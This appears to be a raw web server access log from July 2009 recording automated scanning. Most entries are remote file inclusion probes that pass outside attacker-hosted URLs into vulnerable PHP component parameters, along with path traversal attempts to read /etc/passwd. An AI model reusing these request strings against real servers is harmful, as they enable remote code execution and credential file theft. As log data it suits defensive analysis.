206.225.23.4 - - [18/Jul/2009:02:54:06 -0400] "GET /logs/access_log.Q109060700//?path%5Bdocroot%5D=http://www.dracocafe.pl/sklep/components/com_sef/1.txt? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
193.137.102.7 - - [18/Jul/2009:02:54:06 -0400] "GET /login.php?dir=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 207 "-" "libwww-perl/5.805"
193.137.102.7 - - [18/Jul/2009:02:54:06 -0400] "GET /login.php?dir=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 207 "-" "libwww-perl/5.805"
82.146.58.26 - - [18/Jul/2009:02:54:06 -0400] "GET /logs/access_log.Q109070300//components/com_flyspray/startdown.php?file=http://211.179.234.210:8000/design07/user/user/info//fx29id.txt?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
193.137.102.7 - - [18/Jul/2009:02:54:06 -0400] "GET /logs/login.php?dir=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 212 "-" "libwww-perl/5.805"
193.137.102.7 - - [18/Jul/2009:02:54:06 -0400] "GET /logs/login.php?dir=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 212 "-" "libwww-perl/5.805"
213.149.105.8 - - [18/Jul/2009:02:54:15 -0400] "GET /logs/access_log.Q109062900%20%20//components/com_flyspray/startdown.php?file=http://211.179.234.210:8000/design07/user/user/info//fx29id.txt?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
213.149.105.8 - - [18/Jul/2009:02:54:15 -0400] "GET /logs/access_log.Q109070300%20%20//components/com_flyspray/startdown.php?file=http://211.179.234.210:8000/design07/user/user/info//fx29id.txt?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
206.225.23.4 - - [18/Jul/2009:02:54:15 -0400] "GET /logs/access_log.Q109060700%20%20//?path%5Bdocroot%5D=http://www.dracocafe.pl/sklep/components/com_sef/1.txt? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
115.92.96.43 - - [18/Jul/2009:02:54:17 -0400] "GET /logs/access_log.Q109051400//?_zb_path=http://www.1remont.ru/readme.txt?? HTTP/1.1" 404 226 "-" "libwww-perl/5.805"
206.225.23.4 - - [18/Jul/2009:02:54:19 -0400] "GET /logs/access_log.Q109060700%20%20//?path%5Bdocroot%5D=http://www.dracocafe.pl/sklep/components/com_sef/1.txt? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
206.225.23.4 - - [18/Jul/2009:02:54:20 -0400] "GET /logs/access_log.Q109060700%20%20//?path%5Bdocroot%5D=http://www.dracocafe.pl/sklep/components/com_sef/1.txt? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
115.92.96.43 - - [18/Jul/2009:02:54:28 -0400] "GET /logs/access_log.Q109061300/login.php?dir=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
115.92.96.43 - - [18/Jul/2009:02:54:29 -0400] "GET /login.php?dir=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 207 "-" "libwww-perl/5.805"
115.92.96.43 - - [18/Jul/2009:02:54:30 -0400] "GET /logs/login.php?dir=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 212 "-" "libwww-perl/5.805"
83.96.135.55 - - [18/Jul/2009:02:54:43 -0400] "GET /logs/access_log.Q109061700%20%20//components/com_flyspray/startdown.php?file=http://211.179.234.210:8000/design07/user/user/info//fx29id.txt?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
203.57.78.8 - - [18/Jul/2009:02:54:50 -0400] "GET //components/com_flyspray/startdown.php?file=http://211.179.234.210:8000/design07/user/user/info//fx29id.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
203.57.78.8 - - [18/Jul/2009:02:54:50 -0400] "GET /logs//components/com_flyspray/startdown.php?file=http://211.179.234.210:8000/design07/user/user/info//fx29id.txt?? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
203.57.78.8 - - [18/Jul/2009:02:54:50 -0400] "GET /logs/access_log.Q109062900//components/com_flyspray/startdown.php?file=http://211.179.234.210:8000/design07/user/user/info//fx29id.txt?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
203.57.78.8 - - [18/Jul/2009:02:54:50 -0400] "GET /logs/access_log.Q109070300//components/com_flyspray/startdown.php?file=http://211.179.234.210:8000/design07/user/user/info//fx29id.txt?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
193.137.102.7 - - [18/Jul/2009:02:55:00 -0400] "GET /logs/access_log.Q109062000//components/com_simpleboard/image_upload.php?sbp=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 269 "-" "libwww-perl/5.805"
193.137.102.7 - - [18/Jul/2009:02:55:02 -0400] "GET /logs/access_log.Q109062000//components/com_simpleboard/image_upload.php?sbp=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 269 "-" "libwww-perl/5.805"
72.30.161.230 - - [18/Jul/2009:02:55:10 -0400] "GET /logs/error_log.Q107070500 HTTP/1.0" 404 223 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
193.137.102.7 - - [18/Jul/2009:02:55:45 -0400] "GET /logs/access_log.Q109061700/login.php?dir=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
193.137.102.7 - - [18/Jul/2009:02:55:45 -0400] "GET /logs/access_log.Q109061700/login.php?dir=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
193.137.102.7 - - [18/Jul/2009:02:55:50 -0400] "GET //components/com_simpleboard/image_upload.php?sbp=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 242 "-" "libwww-perl/5.805"
193.137.102.7 - - [18/Jul/2009:02:55:50 -0400] "GET //components/com_simpleboard/image_upload.php?sbp=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 242 "-" "libwww-perl/5.805"
115.92.96.43 - - [18/Jul/2009:02:56:27 -0400] "GET /logs/access_log.Q109062000//components/com_simpleboard/image_upload.php?sbp=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 269 "-" "libwww-perl/5.805"
193.137.102.7 - - [18/Jul/2009:02:56:29 -0400] "GET /logs/access_log.Q109070200/wp-content/plugins/dm-albums/template/album.php?SECURITY_FILE=http://quangpham.info/wp-includes/images/blank.gif?? HTTP/1.1" 404 272 "-" "libwww-perl/5.805"
193.137.102.7 - - [18/Jul/2009:02:56:30 -0400] "GET /wp-content/plugins/dm-albums/template/album.php?SECURITY_FILE=http://quangpham.info/wp-includes/images/blank.gif?? HTTP/1.1" 404 245 "-" "libwww-perl/5.805"
193.137.102.7 - - [18/Jul/2009:02:56:30 -0400] "GET /logs/wp-content/plugins/dm-albums/template/album.php?SECURITY_FILE=http://quangpham.info/wp-includes/images/blank.gif?? HTTP/1.1" 404 250 "-" "libwww-perl/5.805"
115.92.96.43 - - [18/Jul/2009:02:56:40 -0400] "GET /logs/access_log.Q109061700/login.php?dir=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
193.137.102.7 - - [18/Jul/2009:02:56:52 -0400] "GET //include/mail.inc.php?site_path=http://quangpham.info/wp-includes/images/blank.gif?? HTTP/1.1" 404 219 "-" "libwww-perl/5.805"
115.92.96.43 - - [18/Jul/2009:02:56:53 -0400] "GET /logs/access_log.Q109052800/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.1remont.ru/readme.txt?? HTTP/1.1" 404 266 "-" "libwww-perl/5.805"
115.92.96.43 - - [18/Jul/2009:02:56:53 -0400] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.1remont.ru/readme.txt?? HTTP/1.1" 404 239 "-" "libwww-perl/5.805"
115.92.96.43 - - [18/Jul/2009:02:56:54 -0400] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.1remont.ru/readme.txt?? HTTP/1.1" 404 244 "-" "libwww-perl/5.805"
206.225.23.4 - - [18/Jul/2009:02:57:08 -0400] "GET /logs/access_log.Q109050800%20%20//inc/cmses/aedating4CMS.php?dir[inc]=http://www.dracocafe.pl/sklep/components/com_sef/1.txt? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
206.225.23.4 - - [18/Jul/2009:02:57:08 -0400] "GET //inc/cmses/aedating4CMS.php?dir[inc]=http://www.dracocafe.pl/sklep/components/com_sef/1.txt? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
206.225.23.4 - - [18/Jul/2009:02:57:08 -0400] "GET /logs//inc/cmses/aedating4CMS.php?dir[inc]=http://www.dracocafe.pl/sklep/components/com_sef/1.txt? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
209.59.12.99 - - [18/Jul/2009:02:57:10 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
206.225.23.4 - - [18/Jul/2009:02:57:10 -0400] "GET /logs/access_log.Q109050800%20%20//inc/cmses/aedating4CMS.php?dir[inc]=http://www.dracocafe.pl/sklep/components/com_sef/1.txt? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
206.225.23.4 - - [18/Jul/2009:02:57:10 -0400] "GET //inc/cmses/aedating4CMS.php?dir[inc]=http://www.dracocafe.pl/sklep/components/com_sef/1.txt? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
206.225.23.4 - - [18/Jul/2009:02:57:10 -0400] "GET /logs//inc/cmses/aedating4CMS.php?dir[inc]=http://www.dracocafe.pl/sklep/components/com_sef/1.txt? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
206.225.23.4 - - [18/Jul/2009:02:57:19 -0400] "GET /logs/access_log.Q109050800%20%20//inc/cmses/aedating4CMS.php?dir[inc]=http://www.dracocafe.pl/sklep/components/com_sef/1.txt? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
206.225.23.4 - - [18/Jul/2009:02:57:19 -0400] "GET //inc/cmses/aedating4CMS.php?dir[inc]=http://www.dracocafe.pl/sklep/components/com_sef/1.txt? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
206.225.23.4 - - [18/Jul/2009:02:57:19 -0400] "GET /logs//inc/cmses/aedating4CMS.php?dir[inc]=http://www.dracocafe.pl/sklep/components/com_sef/1.txt? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
115.92.96.43 - - [18/Jul/2009:02:57:21 -0400] "GET //components/com_simpleboard/image_upload.php?sbp=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 242 "-" "libwww-perl/5.805"
115.92.96.43 - - [18/Jul/2009:02:57:22 -0400] "GET //include/mail.inc.php?site_path=http://www.1remont.ru/readme.txt?? HTTP/1.1" 404 219 "-" "libwww-perl/5.805"
74.223.143.131 - - [18/Jul/2009:02:57:30 -0400] "GET /xGB.php?act=admin&do=http://www2.risda.gov.my/id2.txt?? HTTP/1.1" 404 205 "-" "Mozilla/5.0"
74.223.143.131 - - [18/Jul/2009:02:57:30 -0400] "GET /logs/xGB.php?act=admin&do=http://www2.risda.gov.my/id2.txt?? HTTP/1.1" 404 210 "-" "Mozilla/5.0"
74.223.143.131 - - [18/Jul/2009:02:57:30 -0400] "GET /logs/access_log.Q109070700/xGB.php?act=admin&do=http://www2.risda.gov.my/id2.txt?? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
74.223.143.131 - - [18/Jul/2009:02:57:33 -0400] "GET /logs/xGB.php?act=admin&do=http://www2.risda.gov.my/id2.txt?? HTTP/1.1" 404 210 "-" "Mozilla/5.0"
74.223.143.131 - - [18/Jul/2009:02:57:33 -0400] "GET /logs/access_log.Q109070700/xGB.php?act=admin&do=http://www2.risda.gov.my/id2.txt?? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
74.223.143.131 - - [18/Jul/2009:02:57:33 -0400] "GET /xGB.php?act=admin&do=http://www2.risda.gov.my/id2.txt?? HTTP/1.1" 404 205 "-" "Mozilla/5.0"
190.144.44.36 - - [18/Jul/2009:02:57:50 -0400] "GET //authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]=http://aboutav.com//id1.txt??? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
190.144.44.36 - - [18/Jul/2009:02:57:50 -0400] "GET /logs//authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]=http://aboutav.com//id1.txt??? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
210.110.97.12 - - [18/Jul/2009:02:58:37 -0400] "GET //include/mail.inc.php?site_path=http://www.1remont.ru/readme.txt?? HTTP/1.1" 404 219 "-" "libwww-perl/5.65"
190.144.44.36 - - [18/Jul/2009:02:58:46 -0400] "GET //authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]=http://aboutav.com//id1.txt??? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
190.144.44.36 - - [18/Jul/2009:02:58:46 -0400] "GET /logs//authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]=http://aboutav.com//id1.txt??? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
210.110.97.12 - - [18/Jul/2009:02:58:52 -0400] "GET //components/com_simpleboard/image_upload.php?sbp=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 242 "-" "libwww-perl/5.65"
115.92.96.43 - - [18/Jul/2009:02:58:52 -0400] "GET /logs/access_log.Q109052600/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.1remont.ru/readme.txt?? HTTP/1.1" 404 266 "-" "libwww-perl/5.805"
206.225.23.4 - - [18/Jul/2009:02:58:53 -0400] "GET /logs/access_log.Q109050800//inc/cmses/aedating4CMS.php?dir[inc]=http://www.dracocafe.pl/sklep/components/com_sef/1.txt? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
206.225.23.4 - - [18/Jul/2009:02:59:12 -0400] "GET /logs/access_log.Q109050800//inc/cmses/aedating4CMS.php?dir[inc]=http://www.dracocafe.pl/sklep/components/com_sef/1.txt? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
115.92.96.43 - - [18/Jul/2009:02:59:29 -0400] "GET /logs/access_log.Q109070200/wp-content/plugins/dm-albums/template/album.php?SECURITY_FILE=http://www.1remont.ru/readme.txt?? HTTP/1.1" 404 272 "-" "libwww-perl/5.805"
115.92.96.43 - - [18/Jul/2009:02:59:30 -0400] "GET /wp-content/plugins/dm-albums/template/album.php?SECURITY_FILE=http://www.1remont.ru/readme.txt?? HTTP/1.1" 404 245 "-" "libwww-perl/5.805"
115.92.96.43 - - [18/Jul/2009:02:59:30 -0400] "GET /logs/wp-content/plugins/dm-albums/template/album.php?SECURITY_FILE=http://www.1remont.ru/readme.txt?? HTTP/1.1" 404 250 "-" "libwww-perl/5.805"
118.129.166.129 - - [18/Jul/2009:02:59:34 -0400] "GET //newspublish/include.php?path[docroot]=http://www.angelcitytrading.com/css/1.zot?? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
118.129.166.129 - - [18/Jul/2009:02:59:34 -0400] "GET /logs//newspublish/include.php?path[docroot]=http://www.angelcitytrading.com/css/1.zot?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
118.129.166.129 - - [18/Jul/2009:02:59:35 -0400] "GET /logs/access_log.Q109051800//newspublish/include.php?path[docroot]=http://www.angelcitytrading.com/css/1.zot?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
193.137.102.7 - - [18/Jul/2009:02:59:43 -0400] "GET /logs/error_log.Q109071400/wp-content/plugins/dm-albums/template/album.php?SECURITY_FILE=http://quangpham.info/wp-includes/images/blank.gif?? HTTP/1.1" 404 271 "-" "libwww-perl/5.805"
118.129.166.129 - - [18/Jul/2009:02:59:44 -0400] "GET /logs/access_log.Q109053100//newspublish/include.php?path[docroot]=http://www.angelcitytrading.com/css/1.zot?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
115.92.96.43 - - [18/Jul/2009:02:59:54 -0400] "GET //?_zb_path=http://www.1remont.ru/readme.txt?? HTTP/1.1" 200 452 "-" "libwww-perl/5.805"
76.163.252.93 - - [18/Jul/2009:03:00:08 -0400] "GET //frame.php?framefile=http://palle.altervista.org/id1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
76.163.252.93 - - [18/Jul/2009:03:00:08 -0400] "GET /logs//frame.php?framefile=http://palle.altervista.org/id1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
76.163.252.93 - - [18/Jul/2009:03:00:08 -0400] "GET /logs/access_log.Q109052500%20%20//frame.php?framefile=http://palle.altervista.org/id1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
74.223.143.131 - - [18/Jul/2009:03:00:34 -0400] "GET /logs/access_log.Q109070700%20%20/xGB.php?act=admin&do=http://www2.risda.gov.my/id2.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
76.163.252.93 - - [18/Jul/2009:03:00:37 -0400] "GET /logs/access_log.Q109051200%20%20//frame.php?framefile=http://palle.altervista.org/id1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
74.223.143.131 - - [18/Jul/2009:03:00:44 -0400] "GET /logs/access_log.Q109070700%20%20/xGB.php?act=admin&do=http://www2.risda.gov.my/id2.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
203.57.78.8 - - [18/Jul/2009:03:00:46 -0400] "GET /logs/access_log.Q109062900%20%20//components/com_flyspray/startdown.php?file=http://211.179.234.210:8000/design07/user/user/info//fx29id.txt?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
193.137.102.7 - - [18/Jul/2009:03:00:59 -0400] "GET //include/mail.inc.php?site_path=http://quangpham.info/wp-includes/images/blank.gif?? HTTP/1.1" 404 219 "-" "libwww-perl/5.805"
61.100.189.234 - - [18/Jul/2009:03:01:15 -0400] "GET /logs/access_log.Q109061000///?_SERVER[DOCUMENT_ROOT]=http://www.peb.com.ua/ua/readme.txt?? HTTP/1.1" 404 227 "-" "libwww-perl/5.79"
61.100.189.234 - - [18/Jul/2009:03:01:16 -0400] "GET ///?_SERVER[DOCUMENT_ROOT]=http://www.peb.com.ua/ua/readme.txt?? HTTP/1.1" 200 453 "-" "libwww-perl/5.79"
61.100.189.234 - - [18/Jul/2009:03:01:16 -0400] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://www.peb.com.ua/ua/readme.txt?? HTTP/1.1" 200 10000 "-" "libwww-perl/5.79"
203.57.78.8 - - [18/Jul/2009:03:01:23 -0400] "GET /logs/access_log.Q109070300%20%20//components/com_flyspray/startdown.php?file=http://211.179.234.210:8000/design07/user/user/info//fx29id.txt?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
210.110.97.12 - - [18/Jul/2009:03:01:24 -0400] "GET //?_zb_path=http://www.1remont.ru/readme.txt?? HTTP/1.1" 200 452 "-" "libwww-perl/5.65"
58.120.227.242 - - [18/Jul/2009:03:01:38 -0400] "GET //components/com_simpleboard/image_upload.php?sbp=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 242 "-" "libwww-perl/5.810"
70.168.96.43 - - [18/Jul/2009:03:01:43 -0400] "GET /logs/access_log.Q109062900%20%20//components/com_flyspray/startdown.php?file=http://211.179.234.210:8000/design07/user/user/info//fx29id.txt?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
70.168.96.43 - - [18/Jul/2009:03:01:43 -0400] "GET /logs/access_log.Q109070300%20%20//components/com_flyspray/startdown.php?file=http://211.179.234.210:8000/design07/user/user/info//fx29id.txt?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
221.143.51.115 - - [18/Jul/2009:03:02:15 -0400] "GET //components/com_simpleboard/image_upload.php?sbp=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 242 "-" "libwww-perl/5.79"
209.59.12.99 - - [18/Jul/2009:03:02:16 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
193.137.102.7 - - [18/Jul/2009:03:02:18 -0400] "GET /logs/access_log.Q109070300//vwar/backup/errors.php?error=http://quangpham.info/wp-includes/images/blank.gif?? HTTP/1.1" 404 248 "-" "libwww-perl/5.805"
193.137.102.7 - - [18/Jul/2009:03:02:18 -0400] "GET //vwar/backup/errors.php?error=http://quangpham.info/wp-includes/images/blank.gif?? HTTP/1.1" 404 221 "-" "libwww-perl/5.805"
193.137.102.7 - - [18/Jul/2009:03:02:19 -0400] "GET /logs//vwar/backup/errors.php?error=http://quangpham.info/wp-includes/images/blank.gif?? HTTP/1.1" 404 226 "-" "libwww-perl/5.805"
218.38.136.251 - - [18/Jul/2009:03:02:39 -0400] "GET /logs//ggambo7002_board/write.php?dir=http://220.130.180.180/id/ManieZ.jpg???? HTTP/1.1" 404 230 "-" "libwww-perl/5.65"
218.38.136.251 - - [18/Jul/2009:03:02:40 -0400] "GET /logs/access_log.Q109070200//ggambo7002_board/write.php?dir=http://220.130.180.180/id/ManieZ.jpg???? HTTP/1.1" 404 252 "-" "libwww-perl/5.65"
218.38.136.251 - - [18/Jul/2009:03:02:40 -0400] "GET //ggambo7002_board/write.php?dir=http://220.130.180.180/id/ManieZ.jpg???? HTTP/1.1" 404 225 "-" "libwww-perl/5.65"
216.117.172.131 - - [18/Jul/2009:03:02:40 -0400] "GET //bbs//skin/ggambo7002_board/write.php?dir=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
216.117.172.131 - - [18/Jul/2009:03:02:40 -0400] "GET /logs//bbs//skin/ggambo7002_board/write.php?dir=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
216.117.172.131 - - [18/Jul/2009:03:02:40 -0400] "GET /logs/access_log.Q109070800//bbs//skin/ggambo7002_board/write.php?dir=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
193.137.102.7 - - [18/Jul/2009:03:02:41 -0400] "GET /logs/access_log.Q109051000//vwar/backup/errors.php?error=http://quangpham.info/wp-includes/images/blank.gif?? HTTP/1.1" 404 248 "-" "libwww-perl/5.805"
216.117.172.131 - - [18/Jul/2009:03:02:47 -0400] "GET //bbs//skin/ggambo7002_board/write.php?dir=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
216.117.172.131 - - [18/Jul/2009:03:02:47 -0400] "GET /logs//bbs//skin/ggambo7002_board/write.php?dir=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
216.117.172.131 - - [18/Jul/2009:03:02:47 -0400] "GET /logs/access_log.Q109070800//bbs//skin/ggambo7002_board/write.php?dir=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
218.38.136.251 - - [18/Jul/2009:03:02:48 -0400] "GET /logs/access_log.Q109070200//ggambo7002_board/write.php?dir=http://220.130.180.180/id/ManieZ.jpg???? HTTP/1.1" 404 252 "-" "libwww-perl/5.65"
218.38.136.251 - - [18/Jul/2009:03:02:48 -0400] "GET /logs//ggambo7002_board/write.php?dir=http://220.130.180.180/id/ManieZ.jpg???? HTTP/1.1" 404 230 "-" "libwww-perl/5.65"
193.137.102.7 - - [18/Jul/2009:03:02:50 -0400] "GET //components/com_simpleboard/image_upload.php?sbp=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 242 "-" "libwww-perl/5.805"
218.38.136.251 - - [18/Jul/2009:03:02:50 -0400] "GET //ggambo7002_board/write.php?dir=http://220.130.180.180/id/ManieZ.jpg???? HTTP/1.1" 404 225 "-" "libwww-perl/5.65"
193.137.102.7 - - [18/Jul/2009:03:02:50 -0400] "GET //components/com_simpleboard/image_upload.php?sbp=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 242 "-" "libwww-perl/5.805"
118.129.166.129 - - [18/Jul/2009:03:02:50 -0400] "GET /logs/access_log.Q109051800%20%20//newspublish/include.php?path[docroot]=http://www.angelcitytrading.com/css/1.zot?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
118.129.166.129 - - [18/Jul/2009:03:02:57 -0400] "GET /logs/access_log.Q109053100%20%20//newspublish/include.php?path[docroot]=http://www.angelcitytrading.com/css/1.zot?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
218.38.136.251 - - [18/Jul/2009:03:03:02 -0400] "GET /logs/access_log.Q109070200//ggambo7002_board/write.php?dir=http://220.130.180.180/id/ManieZ.jpg???? HTTP/1.1" 404 252 "-" "libwww-perl/5.65"
218.38.136.251 - - [18/Jul/2009:03:03:02 -0400] "GET //ggambo7002_board/write.php?dir=http://220.130.180.180/id/ManieZ.jpg???? HTTP/1.1" 404 225 "-" "libwww-perl/5.65"
218.38.136.251 - - [18/Jul/2009:03:03:02 -0400] "GET /logs//ggambo7002_board/write.php?dir=http://220.130.180.180/id/ManieZ.jpg???? HTTP/1.1" 404 230 "-" "libwww-perl/5.65"
221.143.51.115 - - [18/Jul/2009:03:03:07 -0400] "GET //include/mail.inc.php?site_path=http://www.1remont.ru/readme.txt?? HTTP/1.1" 404 219 "-" "libwww-perl/5.79"
115.92.96.43 - - [18/Jul/2009:03:03:18 -0400] "GET /logs/access_log.Q109070300//vwar/backup/errors.php?error=http://www.1remont.ru/readme.txt?? HTTP/1.1" 404 248 "-" "libwww-perl/5.805"
115.92.96.43 - - [18/Jul/2009:03:03:19 -0400] "GET //vwar/backup/errors.php?error=http://www.1remont.ru/readme.txt?? HTTP/1.1" 404 221 "-" "libwww-perl/5.805"
115.92.96.43 - - [18/Jul/2009:03:03:20 -0400] "GET /logs//vwar/backup/errors.php?error=http://www.1remont.ru/readme.txt?? HTTP/1.1" 404 226 "-" "libwww-perl/5.805"
61.100.189.234 - - [18/Jul/2009:03:03:43 -0400] "GET /logs/access_log.Q109052900///?_SERVER[DOCUMENT_ROOT]=http://www.peb.com.ua/ua/readme.txt?? HTTP/1.1" 404 227 "-" "libwww-perl/5.79"
210.110.97.12 - - [18/Jul/2009:03:03:46 -0400] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.1remont.ru/readme.txt?? HTTP/1.1" 404 239 "-" "libwww-perl/5.65"
206.225.23.4 - - [18/Jul/2009:03:03:49 -0400] "GET /?_SERVER[DOCUMENT_ROOT]=http://netseoul.com/gboard/rs/copyright.txt???? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
206.225.23.4 - - [18/Jul/2009:03:03:49 -0400] "GET /logs/?_SERVER[DOCUMENT_ROOT]=http://netseoul.com/gboard/rs/copyright.txt???? HTTP/1.1" 200 9994 "-" "Mozilla/5.0"
206.225.23.4 - - [18/Jul/2009:03:03:49 -0400] "GET /logs/access_log.Q109061900%20%20/?_SERVER[DOCUMENT_ROOT]=http://netseoul.com/gboard/rs/copyright.txt???? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
74.223.143.131 - - [18/Jul/2009:03:03:53 -0400] "GET /logs/access_log.Q109052400/xGB.php?act=admin&do=http://www2.risda.gov.my/id2.txt?? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
206.225.23.4 - - [18/Jul/2009:03:03:53 -0400] "GET /logs/access_log.Q109061200%20%20/?_SERVER[DOCUMENT_ROOT]=http://netseoul.com/gboard/rs/copyright.txt???? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
115.92.96.43 - - [18/Jul/2009:03:03:58 -0400] "GET /logs/access_log.Q109051000//vwar/backup/errors.php?error=http://www.1remont.ru/readme.txt?? HTTP/1.1" 404 248 "-" "libwww-perl/5.805"
74.223.143.131 - - [18/Jul/2009:03:04:01 -0400] "GET /logs/access_log.Q109052400/xGB.php?act=admin&do=http://www2.risda.gov.my/id2.txt?? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
115.92.96.43 - - [18/Jul/2009:03:04:28 -0400] "GET /logs/error_log.Q109071400/wp-content/plugins/dm-albums/template/album.php?SECURITY_FILE=http://www.1remont.ru/readme.txt?? HTTP/1.1" 404 271 "-" "libwww-perl/5.805"
216.117.172.131 - - [18/Jul/2009:03:04:28 -0400] "GET /logs/access_log.Q109071500%20%20//bbs//skin/ggambo7002_board/write.php?dir=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
216.117.172.131 - - [18/Jul/2009:03:04:36 -0400] "GET /logs/access_log.Q109071500%20%20//bbs//skin/ggambo7002_board/write.php?dir=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
